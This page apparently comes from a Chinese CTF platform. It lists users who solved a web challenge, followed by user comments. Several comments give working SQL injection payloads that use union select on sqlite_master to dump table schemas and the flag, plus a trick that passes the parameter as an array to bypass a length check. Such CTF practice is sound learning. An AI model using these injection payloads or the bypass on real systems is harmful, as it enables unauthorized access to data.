评分(1)
解题动态
ctfctf1 攻破了该题 2天前
xiongh 攻破了该题 1月前
若叶 攻破了该题 1月前
倦鸟叫了一整天 攻破了该题 2月前
sann111 攻破了该题 3月前
fatcat 攻破了该题 5月前
amobaishi 攻破了该题 6月前
陌染缥 攻破了该题 7月前
tianna 攻破了该题 8月前
coldplay99999 攻破了该题 8月前
sraiL 攻破了该题 8月前
么啊吗吗吗吗 攻破了该题 9月前
91porn 攻破了该题 10月前
bugbiubiubiu 攻破了该题 10月前
a1104048658 攻破了该题 11月前
LancyMorry 攻破了该题 1年前
guojiachangsheng 攻破了该题 1年前
bugkuctf6 攻破了该题 1年前
2321331170 攻破了该题 1年前
评论
不要不要 1年前
举报
bp抓包,URL编码。 name[]=-534249' union select name,sql from sqlite_master--+ 得到表名和建表语句,知道表的字段flag name[]=-534249' union select flag,flag from flag_01ffe035_7ddb_4c79_9a09_8a0b2e6a2705--+
justsosoloveyou 1年前
举报
关键是用name[]=,绕过name.length的长度限制。如:/?name[]=1&name[]=2能够将两个值作为同参数名的数组提交给服务器,但是name=[1,2],name.length=2。
xht0525 1年前
举报
name[]=changzifuchuan' union select name,name from sqlite_master--